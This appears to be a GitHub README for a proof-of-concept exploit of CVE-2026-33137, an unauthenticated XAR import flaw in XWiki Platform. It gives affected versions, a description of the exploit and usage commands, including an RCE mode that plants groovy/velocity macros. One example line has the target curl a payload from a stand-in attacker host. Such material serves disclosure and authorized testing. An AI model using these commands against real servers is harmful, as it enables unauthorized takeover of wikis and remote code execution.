portbuster1337/CVE-2026-33137

# CVE-2026-33137 **XWiki Platform - Unauthenticated XAR Import via REST `/wikis/{wikiName}`** ## Description The `POST /wikis/{wikiName}` REST API endpoint in XWiki Platform executes a XAR (XWiki Archive) import **without performing any authentication or authorization checks**. An unauthenticated attacker can create or update arbitrary documents in the target wiki by sending a crafted XAR file. - **CVE**: CVE-2026-33137 - **CWE**: CWE-862 Missing Authorization - **CVSS 4.0**: 9.3 (Critical) - `AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N` - **Published**: 2026-05-20 ## Affected Versions | Status | Versions | |--------|----------| | Vulnerable | > 15.10.16, > 16.4.6, > 16.10.2 | | Patched | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 | ## Impact An unauthenticated attacker can: - Create arbitrary wiki pages with arbitrary content - Overwrite existing wiki pages - Potentially achieve RCE by creating pages with malicious Velocity/Groovy scripts (if scripting is enabled) ## Details The REST endpoint `POST /xwiki/rest/wikis/{wikiName}` accepts a XAR file in the request body and imports it directly into the wiki without checking if the requester has ADMIN rights. The fix (commit `4b7b95b`) adds an authorization check using `ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...)`. ## PoC Usage # Install requirements pip install requests # Basic usage python poc.py -t http://target:8080 # Specify wiki, space, and page names python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage # Probe the target first python poc.py -t http://target:8080 --probe # Use a proxy (e.g., Burp Suite) python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080 # Custom content python poc.py -t http://target:8080 -c "Proof of Concept" # RCE mode: execute a command on the target server python poc.py -t http://target:8080 --rce "id" # RCE with authenticated triggering (if credentials are available) python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass ## RCE Mode (`--rce`) 1. Runs a pre-flight check (version detection, vulnerability status, XAR endpoint test, trigger path accessibility) 2. Imports pages with the user-specified command embedded in `{{groovy}}` and `{{velocity}}` macros 3. Attempts rendering via REST API, web UI, and SSTI-style injection 4. Reports which trigger paths are accessible vs blocked **Requirements for successful RCE:** - The target must allow guest viewing of pages (or credentials provided via `-u` / `--password`) - Scripting/programming rights must be enabled for the viewing user - Trigger paths must not be blocked by authentication redirects ## How the Exploit Works 1. A minimal XAR (ZIP) file is constructed containing: - `package.xml` - package descriptor - `{Space}/{Page}.xml` - document XML with content 2. The XAR bytes are POSTed to the vulnerable endpoint 3. If vulnerable, the document is created without authentication 4. Optionally verifies by reading back the document metadata ## Disclaimer This PoC is provided for educational and authorized security testing purposes only. Unauthorized use of this exploit against systems you do not own or have explicit permission to test is illegal. The author is not responsible for any misuse or damage caused by this software. ## References - [GitHub Security Advisory GHSA-qrvh-r3f2-9h4r](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qrvh-r3f2-9h4r) - [Commit 4b7b95b (fix)](https://github.com/xwiki/xwiki-platform/commit/4b7b95b79256374d487e9ece1dc48f527966990f) - [JIRA XWIKI-23953](https://jira.xwiki.org/browse/XWIKI-23953) - [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2026-33137)